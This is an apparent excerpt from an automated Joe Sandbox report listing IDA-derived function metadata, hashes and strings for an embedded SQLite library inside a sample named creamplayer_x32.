                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1465156292-0
                                                                                                    • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                                    • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                                                                    • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                                    • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                                                                    APIs
                                                                                                      • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1465156292-0
                                                                                                    • Opcode ID: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                                                                    • Instruction ID: 4fd0dfe8dd6226820e052206e0db6187a6d8a97f2116fb4a305c2fd2856f8961
                                                                                                    • Opcode Fuzzy Hash: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                                                                    • Instruction Fuzzy Hash: 94F08CB5A002099BCB00DF2AD88088ABBBAFF98264B05952AEC049B314D770E941CBD0
                                                                                                    APIs
                                                                                                      • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 60925678
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1465156292-0
                                                                                                    • Opcode ID: 20ce1548f611e36a3668a48b9975394e1a388ab84833d9cb320a678b216caf11
                                                                                                    • Instruction ID: bc2fa39936d9f4ed0ba1ebf98b65e017ff83ed2bbf5e058a49948814e7f33c49
                                                                                                    • Opcode Fuzzy Hash: 20ce1548f611e36a3668a48b9975394e1a388ab84833d9cb320a678b216caf11
                                                                                                    • Instruction Fuzzy Hash: 59E0EC74A042089BCB04DF6AD4C194AB7F9EF58258B14D665EC458B309E231E9858BC1
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                                      • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3064317574-0
                                                                                                    • Opcode ID: 8bfbb127be37b3944cf6aee767a60d103abce584902525ba566a621f413e0d82
                                                                                                    • Instruction ID: 7a9bf9350bb0d435b7485bd9c083abc2dab3a9c90cc7cce47300d03dda88f0d0
                                                                                                    • Opcode Fuzzy Hash: 8bfbb127be37b3944cf6aee767a60d103abce584902525ba566a621f413e0d82
                                                                                                    • Instruction Fuzzy Hash: FFD092B4909309AFCB00EF29C48644EBBE5AF98258F40C82DFC98C7314E274E8408F92
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                                                                    • Instruction ID: 29002ccca7877ead4b7e7e784383ace88c03f26ddf616943a2b43c0eb71ea2e3
                                                                                                    • Opcode Fuzzy Hash: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                                                                    • Instruction Fuzzy Hash: 36E0E2B850430DABDF00CF09D8C188A7BAAFB08364F10C119FC190B305C371E9548BA1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c82c79c3d673ce5d83164ffe7b594e49b00bd73c00824d0aa5044480003c1f0d
                                                                                                    • Instruction ID: a276b763828cd9d21177d39229c24ef0f5c00ef14d0f26540801fec71d9d5410
                                                                                                    • Opcode Fuzzy Hash: c82c79c3d673ce5d83164ffe7b594e49b00bd73c00824d0aa5044480003c1f0d
                                                                                                    • Instruction Fuzzy Hash: 29E0E2B850430DABDF00CF09D8C198A7BAAFB08264F10C119FC190B304C331E9148BE1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                                    • Instruction ID: aa639d4c52eda77921d109c173628d401b16d57fa3137d2b917a91732d8775c8
                                                                                                    • Opcode Fuzzy Hash: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                                    • Instruction Fuzzy Hash: D7C01265704208574B00E92DE8C154577AA9718164B108039E80B87301D975ED084291
                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 6096C5BE
                                                                                                      • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                    • sqlite3_log.SQLITE3 ref: 6096C5FC
                                                                                                    • sqlite3_free.SQLITE3 ref: 6096C67E
                                                                                                    • sqlite3_free.SQLITE3 ref: 6096CD71
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
                                                                                                    • sqlite3_errcode.SQLITE3 ref: 6096CD88
                                                                                                    • sqlite3_close.SQLITE3 ref: 6096CD97
                                                                                                    • sqlite3_create_function.SQLITE3 ref: 6096CDF8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
                                                                                                    • API String ID: 1320758876-2501389569
                                                                                                    • Opcode ID: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                                                    • Instruction ID: 66f98c4e8467cc0752991b2fada45a5d6d89a43a55ba94f1559c09c68fc79e30
                                                                                                    • Opcode Fuzzy Hash: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                                                    • Instruction Fuzzy Hash: 7A024BB05183019BEB119F64C49536ABFF6BFA1348F11882DE8959F386D7B9C845CF82
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 609264C9
                                                                                                    • sqlite3_free.SQLITE3 ref: 60926526
                                                                                                    • sqlite3_free.SQLITE3 ref: 6092652E
                                                                                                    • sqlite3_free.SQLITE3 ref: 60926550
                                                                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                      • Part of subcall function 6090AFF5: sqlite3_free.SQLITE3 ref: 6090B09A
                                                                                                    • sqlite3_free.SQLITE3 ref: 60926626
                                                                                                    • sqlite3_win32_mbcs_to_utf8.SQLITE3 ref: 6092662E
                                                                                                    • sqlite3_free.SQLITE3 ref: 60926638
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 6092666B
                                                                                                    • sqlite3_free.SQLITE3 ref: 60926673
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 609266B8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                                                                    • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                                    • API String ID: 937752868-2111127023
                                                                                                    • Opcode ID: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                                    • Instruction ID: 28f04709130b2e8b140c84fcd32bad5e17fba194e1ccee1aab8ced89c5ccf9cf
                                                                                                    • Opcode Fuzzy Hash: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                                    • Instruction Fuzzy Hash: EA712E706183058FE700AF69D88465DBFF6AFA5748F00C82DE8999B314E778C845DF92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc$sqlite3_freesqlite3_vfs_find
                                                                                                    • String ID: @$access$cache
                                                                                                    • API String ID: 4158134138-1361544076
                                                                                                    • Opcode ID: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                                                                    • Instruction ID: 35071b2ec389daa84eb338d99e29a1052eb2425681bc363379ff67fe3f9a0dd7
                                                                                                    • Opcode Fuzzy Hash: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                                                                    • Instruction Fuzzy Hash: 27D19E75D183458BDB11CF69E58039EBBF7AFAA304F20846ED4949B349D339D882CB52
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                                                                    • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                                                                    • BEGIN;, xrefs: 609485DB
                                                                                                    • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                                                                    • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                                                                    • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                                                                    • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                                                                    • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                                                                    • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                                                                    • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                                                                    • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log
                                                                                                    • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                                                                    • API String ID: 632333372-52344843
                                                                                                    • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                                    • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                                                                    • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                                    • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
                                                                                                    APIs
                                                                                                      • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                                      • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                                      • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                                      • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                                      • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                                      • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                                      • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                                                    • sqlite3_free.SQLITE3 ref: 609605EA
                                                                                                    • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                                                    • sqlite3_free.SQLITE3 ref: 60960618
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                                    • String ID: offsets
                                                                                                    • API String ID: 463808202-2642679573
                                                                                                    • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                                    • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                                                    • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                                    • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 2903785150-0
                                                                                                    • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                                    • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                                                    • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                                    • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 423083942-0
                                                                                                    • Opcode ID: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                                    • Instruction ID: dba10035f3c017a022ff92dc0406edc4c972eb6647695f7afdbed5011b3e14eb
